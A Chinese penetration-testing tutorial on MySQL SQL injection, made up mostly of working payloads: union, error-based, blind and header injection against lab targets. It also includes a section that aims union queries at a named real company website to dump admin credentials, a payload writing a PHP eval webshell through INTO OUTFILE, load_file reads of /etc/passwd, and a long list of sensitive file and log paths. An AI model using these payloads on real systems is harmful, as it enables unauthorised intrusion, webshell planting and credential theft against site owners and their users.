渗透之路 WEB漏洞【第一篇】SQL注入之MySQL
MySQL注入攻击方式
主要有:union 注入、insert/update 注入、delete 注入、http header 注入、函数报错、盲注(base on boolian)、盲注(base on time)、宽字节注入、二次注入等
Mysql数据库特点
Mysql5.0以上版本手工注入(5.0以上不需要暴力猜解了,5.0以下可以采用burp暴力猜解)
查询函数:
Database() :数据库名
Version() :数据库版本
User() : 数据库用户
@@version_compile_os
system_user() :系统用户名
@@datadir:数据库路径
@@basedir:数据库安装路径
table_schema:数据库名
table_name:表名
column_name:列名
information_schema.tables:存储mysql数据库下所有数据库的表名信息的表
information_schema.columns:存储mysql数据库下所有数据库的列名信息的表
Information_schema数据库:mysql5.0以上版本自带的数据库,它是存储mysql数据库下的所有数据库下的表名及列名信息的数据库
union注入
一、规则
规则一、单条select语句的order by num的num不能大于查询的字段数
规则二、两个select语句查询的字段数要相同
二、方法
通过order by num 确定主查询字段数,再使用union select 1,2..num,再将命令替换掉数字
三、注入实战
1.确定主查询字段数:2
提示:The used SELECT statements have a different number of columns
2.判断数据库名称为pikachu
vince' union select Database(),Version()#
3.获取 pikachu 数据库的表名
vince' union select table_schema, table_name from information_schema.tables where table_schema='pikachu' #
your uid:1 your email is: vince@pikachu.com your uid:pikachu your email is: httpinfo your uid:pikachu your email is: member your uid:pikachu your email is: message your uid:pikachu your email is: users your uid:pikachu your email is: xssblind
4.获取 users表数据库的字段名
xxx'union select table_name,column_name from information_schema.columns where table_name='users' #
your uid:users your email is: user_id your uid:users your email is: first_name your uid:users your email is: last_name your uid:users your email is: user your uid:users your email is: password your uid:users your email is: avatar your uid:users your email is: last_login your uid:users your email is: failed_login your uid:users your email is: id your uid:users your email is: username your uid:users your email is: level your uid:users your email is: name
5.最后获取字段值的内容
xxx'union select username ,password from users #
your uid:admin your email is: e10adc3949ba59abbe56e057f20f883e your uid:pikachu your email is: 670b14728ad9902aecba32e22fa4f6bd your uid:test your email is: e99a18c428cb38d5f260853678922e03
函数报错注入
一、前置知识
Mysql没有布尔类型(True,False),存储True,False转为1,0
1.前提:后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端.
2.原理:在 MYSQL 中使用一些指定的凼数来制造报错,从而从报错信息中获取设定的信息,常见的 select/insert/update/delete 注入都可以使用报错方式来获取信息.
3.实战:基于注入类型在输入处构造SQL
4.命令:updatexml()返回的是一个值, 0x7e代表符号~, concat()字符串连接
updatexml()解析
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document 是 String 格式,为 XML 文档对象的名称,文中为 Doc
第二个参数:XPath_string (Xpath 格式的字符串) ,如果不了解 Xpath 语法,可以在网上查找教程。
第三个参数:new_value,String 格式,替换查找到的符合条件的数据
updatexml(1,concat(0x7e,(命令)),1)
1、爆数据库版本信息 updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) 2、爆数据库当前用户 updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) 3、爆数据库 updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 4、爆表 #limit m,n 每页n条数据,当前第m页 updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu'limit 0,1)),0)
二、案例
都是构造update命令,select/insert/update/delete原理都一样,这里只举例select、insert
select 注入
都是把某个值加入updatexml,原理一样,这里只举例select
insert 注入
http头注入
手工测试,存在注入
列数据库
爆表
id字段每张表都有
爆字段
cookie 注入
盲注
在我们的注入语句被带入数据库查询但却什么都没有返回的情况我们该怎么办?例如应用程序就会返回一个“通用的”的页面,戒者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的 SQL 注入办法就无法使用了。
(布尔型)(推荐)
使用burp注入
(时间型)
原理:命令正确则延迟返回
if(命令,sleep(x),null)
填入 vince' and if(substr(database(),1,1)='p',sleep(5), null)#
php编程基础
Php语言开端,结尾
注释符(单行,多行)
*单引号,双引号区别(单引号不解析变量,双引号解析变量)
*变量赋值,接受方式
*Php+Mysql函数
模拟演练
<? $id = $_GET['x']; $conn = mysql_connect('127.0.0.1','root','root'); mysql_select_db('fanke',$conn ); $sql = "select * from user where id=$id"; $result = mysql_query($sql); while($row = mysql_fetch_array($result)){ echo "用户ID:".$row['id']."<br >"; echo "用户名".$row['username']."<br >"; echo "用户密码:".$row['password']."<br >"; echo "<hr>"; } mysql_close($conn); echo "<hr>"; echo "you are executing:"; echo $sql; ?>
数据库的一个表
判断注入
Order by xx 猜字段数目(xx<=5均回显正确)
Union select 1,2,3,4,5,.....
查询数据库名为fanke(0x66616E6B65)下面的表名信息
http://127.0.0.1/php.php?x=4union select table_name
,2,3,4,5 from information_schema.tables where table_schema=0x66616E6B65
查询表名为user(0x75736572)下面的列名信息
http://127.0.0.1/php.php?x=4union select column_name
,2,3,4,5 from information_schema.columns where table_name=0x75736572
直接获取user表下面数据
http://127.0.0.1/php.php?x=4union select username,password,3,4,5 from user
修复注入方案:
对参数进行限制
实战
结果:http://www.microtek.com.cn/service2/faq.php?id=31
http://www.microtek.com.cn/service2/faq.php?id=-31 union select Database(),@@version_compile_os
http://www.microtek.com.cn/service2/faq.php?id=-31 union select User(),Version()
查询数据库名为xbase(0x7862617365,小葵转换工具得到)下面的表名信息
http://www.microtek.com.cn/service2/faq.php?id=-31 union select table_name
,2 from information_schema.tables where table_schema=0x7862617365
http://www.microtek.com.cn/service2/faq.php?id=-31 union select group_concat(table_name),2 from information_schema.tables where table_schema=0x7862617365
xbase (0x7862617365)
admin (0x61646D696E)
直接获取admin表下面数据
http://www.microtek.com.cn/service2/faq.php?id=-31 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E
直接获取admin表下面数据
http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT
admin_firstname,admin_password from admin
http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT
admin_firstname,admin_password from admin limit 0,1
http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT
admin_firstname,admin_password from admin limit 1,1
http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT
admin_firstname,admin_password from admin limit 2,1
MySQL文件操作
此方式前提:root注入;木马函数未被禁用
流程:找root注入点->爆文件路径->读取写入
结论:Mysql数据库,非root用户无权限读取写入。
页面代码里的连接数据库用户就是注入的用户
文件读取权限 load_file()
文件写入权限 into outfile
注意:符号建议使用右斜杠”/”,如果使用左斜杠“\”,需采用两个”\\”。
网站绝对路径如何获取?
1.报错显示
2.遗留文件(phpinfo.php)
3.社工(字典猜解,谷歌黑客等)
site: edu.cn warning
4.漏洞爆路径
cms漏洞
5.读取平台配置文件
注入点测试文件读取写入
注意:用单引号不用编码,用编码就不用单引号
读取语句:
http://127.0.0.1/sql.php?x=4%20UNION SELECT
load_file(0x443A5C5C41504D53657276352E322E365C5C7777775C5C6874646F63735C5C73716C2E706870)2,3,4,5
写入语句:
http://127.0.0.1/sql.php?x=4 UNION SELECT '<?php eval($_POST[a])?>',2,3,4,5 into outfile 'D:\\APMServ5.2.6\\www\\htdocs\\yijuhua1.php'
load_file()常用敏感信息
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码. 3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录 4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件 5、c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf 查看WINDOWS系统apache文件 6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息. 7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机 8、d:\APACHE\Apache2\conf\httpd.conf 9、C:\Program Files\mysql\my.ini 10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径 11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件 12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看 13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虚拟主机查看 15、 /etc/sysconfig/iptables 本看防火墙策略 、 /usr/local/app/php5 b/php.ini PHP 的相当设置 、/etc/my.cnf MYSQL的配置文件 18、 /etc/redhat-release 红帽子的系统版本 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码 20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP. 21、/usr/local/app/php5 b/php.ini //PHP相关设置 22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虚拟网站设置 23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini 24、c:\windows\my.ini 25、/etc/issue 显示Linux核心的发行版本信息 26、/etc/ftpuser 27、查看LINUX用户下的操作记录文件.bash_history 或 .bash_profile 28、/etc/ssh/ssh_config /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/logs/access_log /etc/httpd/logs/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache2/access_log /var/log/apache2/access.log /var/www/logs/error_log /var/www/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/error_log /var/log/error.log /var/log/access_log /var/log/access.log /etc/mail/access /etc/my.cnf /var/run/utmp /var/log/wtmp ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/error_log /var/log/httpd/access_log /var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log /etc/httpd/logs/acces_log /etc/httpd/logs/acces.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/apache/access_log /var/log/apache/access.log /var/log/access_log /var/www/logs/error_log /var/www/logs/error.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /var/log/apache/error_log /var/log/apache/error.log /var/log/access_log /var/log/error_log
Php+mysql防注入及绕过
针对关键字过滤(正则表达式)
判断传参类型(类型函数)
行为进行判断
1.针对关键字过滤
1.1函数防护
addslashes()
对单引号、双引号、反斜杠\、NULL字符转义即加上一个\
1.2Php.ini设置
Magic_quotes_gpc 魔术引号
1.3
$x = str_replace("union","x",$_GET['id']);//针对关键字过滤
2.判断传参类型
if(is_numeric($x)){}
绕过思路
1.编码绕过(主要)
2.宽字节注入(鸡肋)
Php+mysql 高级注入语句解析
(爆库,信息收集等)
试验:测试不同数据库用户对数据库的操作权限
Root用户:管理所有数据库,对每个数据库均有管理权限(读取,写入,删除,修改等
Test用户:点对点管理数据库,无数据库管理权限(对其他数据库)
实战思路构思:
1.某服务器搭建若干php+mysql系列网站,其中网站均以root用户进行数据库连接操作
Mysql
Dedecms
Discuz
WordPress Root连接
Phpcms
Phpweb
2.某服务器搭建若干php+mysql系列网站,其中网站均以普通用户进行数据库连接操作
Mysql
Dedecms dede_xxxxx连接
Discuz dz_xxxxx连接
WordPress wp_xxx连接
Phpcms ......
Phpweb .......
Burpsuite+注入工具代理学习高级注入(借助工具学习)
+为空格
获取mysql下所有数据库的注入语句:union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit
0,1),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--
其中limit x,1 x随数字增加而显示下条数据库名
php+mysql注入 尾部补充
1.有时候注入发现没有数字显示?
www.xxx.com/news.php?id=-1 或 and 1=11.....
2.有时候注入表名或列名只出现一个?
Group_concat(table_name) Group_concat(column_name)
www.xxx.com/new.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7... From .....
3.有时候注入密码需要获取更多用户账号密码?
www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin
www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin limit 0,1
www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin limit 1,1
www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin limit 2,1
